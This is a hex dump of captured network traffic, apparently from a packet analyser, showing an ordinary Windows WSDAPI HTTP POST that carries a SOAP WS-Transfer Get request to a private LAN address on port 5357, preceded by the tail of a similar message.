0x000002e0 (00736)   342f3038 2f616464 72657373 696e672f   4/08/addressing/
0x000002f0 (00752)   726f6c65 2f616e6f 6e796d6f 75733c2f   role/anonymous</
0x00000300 (00768)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000310 (00784)   613a5265 706c7954 6f3e3c77 73613a46   a:ReplyTo><wsa:F
0x00000320 (00800)   726f6d3e 3c777361 3a416464 72657373   rom><wsa:Address
0x00000330 (00816)   3e75726e 3a757569 643a6637 30393763   >urn:uuid:f7097c
0x00000340 (00832)   30382d33 3665642d 34653461 2d396565   08-36ed-4e4a-9ee
0x00000350 (00848)   612d6462 62323862 36343039 62613c2f   a-dbb28b6409ba</
0x00000360 (00864)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000370 (00880)   613a4672 6f6d3e3c 6c6d733a 4c617267   a:From><lms:Larg
0x00000380 (00896)   654d6574 61646174 61537570 706f7274   eMetadataSupport
0x00000390 (00912)   2f3e3c2f 736f6170 3a486561 6465723e   /></soap:Header>
0x000003a0 (00928)   3c736f61 703a426f 64792f3e 3c2f736f   <soap:Body/></so
0x000003b0 (00944)   61703a45 6e76656c 6f70653e            ap:Envelope>

0x00000000 (00000)   504f5354 202f3365 31363236 34372d63   POST /3e162647-c
0x00000010 (00016)   3364382d 34346333 2d393937 622d3061   3d8-44c3-997b-0a
0x00000020 (00032)   63396135 66363838 33322f20 48545450   c9a5f68832/ HTTP
0x00000030 (00048)   2f312e31 0d0a4361 6368652d 436f6e74   /1.1..Cache-Cont
0x00000040 (00064)   726f6c3a 206e6f2d 63616368 650d0a43   rol: no-cache..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2043 6c6f7365   onnection: Close
0x00000060 (00096)   0d0a5072 61676d61 3a206e6f 2d636163   ..Pragma: no-cac
0x00000070 (00112)   68650d0a 436f6e74 656e742d 54797065   he..Content-Type
0x00000080 (00128)   3a206170 706c6963 6174696f 6e2f736f   : application/so
0x00000090 (00144)   61702b78 6d6c0d0a 55736572 2d416765   ap+xml..User-Age
0x000000a0 (00160)   6e743a20 57534441 50490d0a 436f6e74   nt: WSDAPI..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3733330d   ent-Length: 733.
0x000000c0 (00192)   0a486f73 743a2031 39322e31 36382e31   .Host: 192.168.1
0x000000d0 (00208)   30302e31 33363a35 3335370d 0a0d0a3c   00.136:5357....<
0x000000e0 (00224)   3f786d6c 20766572 73696f6e 3d22312e   ?xml version="1.
0x000000f0 (00240)   30222065 6e636f64 696e673d 22757466   0" encoding="utf
0x00000100 (00256)   2d38223f 3e3c736f 61703a45 6e76656c   -8"?><soap:Envel
0x00000110 (00272)   6f706520 786d6c6e 733a736f 61703d22   ope xmlns:soap="
0x00000120 (00288)   68747470 3a2f2f77 77772e77 332e6f72   http://www.w3.or
0x00000130 (00304)   672f3230 30332f30 352f736f 61702d65   g/2003/05/soap-e
0x00000140 (00320)   6e76656c 6f706522 20786d6c 6e733a77   nvelope" xmlns:w
0x00000150 (00336)   73613d22 68747470 3a2f2f73 6368656d   sa="http://schem
0x00000160 (00352)   61732e78 6d6c736f 61702e6f 72672f77   as.xmlsoap.org/w
0x00000170 (00368)   732f3230 30342f30 382f6164 64726573   s/2004/08/addres
0x00000180 (00384)   73696e67 2220786d 6c6e733a 6c6d733d   sing" xmlns:lms=
0x00000190 (00400)   22687474 703a2f2f 73636865 6d61732e   "http://schemas.
0x000001a0 (00416)   6d696372 6f736f66 742e636f 6d2f7769   microsoft.com/wi
0x000001b0 (00432)   6e646f77 732f6c6d 732f3230 30372f30   ndows/lms/2007/0
0x000001c0 (00448)   38223e3c 736f6170 3a486561 6465723e   8"><soap:Header>
0x000001d0 (00464)   3c777361 3a546f3e 75726e3a 75756964   <wsa:To>urn:uuid
0x000001e0 (00480)   3a336531 36323634 372d6333 64382d34   :3e162647-c3d8-4
0x000001f0 (00496)   3463332d 39393762 2d306163 39613566   4c3-997b-0ac9a5f
0x00000200 (00512)   36383833 323c2f77 73613a54 6f3e3c77   68832</wsa:To><w
0x00000210 (00528)   73613a41 6374696f 6e3e6874 74703a2f   sa:Action>http:/
0x00000220 (00544)   2f736368 656d6173 2e786d6c 736f6170   /schemas.xmlsoap
0x00000230 (00560)   2e6f7267 2f77732f 32303034 2f30392f   .org/ws/2004/09/
0x00000240 (00576)   7472616e 73666572 2f476574 3c2f7773   transfer/Get</ws
0x00000250 (00592)   613a4163 74696f6e 3e3c7773 613a4d65   a:Action><wsa:Me
0x00000260 (00608)   73736167 6549443e 75726e3a 75756964   ssageID>urn:uuid
0x00000270 (00624)   3a376464 39653732 302d6230 37322d34   :7dd9e720-b072-4
0x00000280 (00640)   3936362d 61336338 2d383137 61636239   966-a3c8-817acb9
0x00000290 (00656)   63323239 623c2f77 73613a4d 65737361   c229b</wsa:Messa
0x000002a0 (00672)   67654944 3e3c7773 613a5265 706c7954   geID><wsa:ReplyT
0x000002b0 (00688)   6f3e3c77 73613a41 64647265 73733e68   o><wsa:Address>h
0x000002c0 (00704)   7474703a 2f2f7363 68656d61 732e786d   ttp://schemas.xm
0x000002d0 (00720)   6c736f61 702e6f72 672f7773 2f323030   lsoap.org/ws/200
0x000002e0 (00736)   342f3038 2f616464 72657373 696e672f   4/08/addressing/
0x000002f0 (00752)   726f6c65 2f616e6f 6e796d6f 75733c2f   role/anonymous</
0x00000300 (00768)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000310 (00784)   613a5265 706c7954 6f3e3c77 73613a46   a:ReplyTo><wsa:F
0x00000320 (00800)   726f6d3e 3c777361 3a416464 72657373   rom><wsa:Address
0x00000330 (00816)   3e75726e 3a757569 643a6533 34383666   >urn:uuid:e3486f
0x00000340 (00832)   31302d66 3433362d 34636365 2d383539   10-f436-4cce-859
0x00000350 (00848)   352d3665 34326230 62373462 35663c2f   5-6e42b0b74b5f</
0x00000360 (00864)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000370 (00880)   613a4672 6f6d3e3c 6c6d733a 4c617267   a:From><lms:Larg
0x00000380 (00896)   654d6574 61646174 61537570 706f7274   eMetadataSupport
0x00000390 (00912)   2f3e3c2f 736f6170 3a486561 6465723e   /></soap:Header>
0x000003a0 (00928)   3c736f61 703a426f 64792f3e 3c2f736f   <soap:Body/></so
0x000003b0 (00944)   61703a45 6e76656c 6f70653e            ap:Envelope>


Strings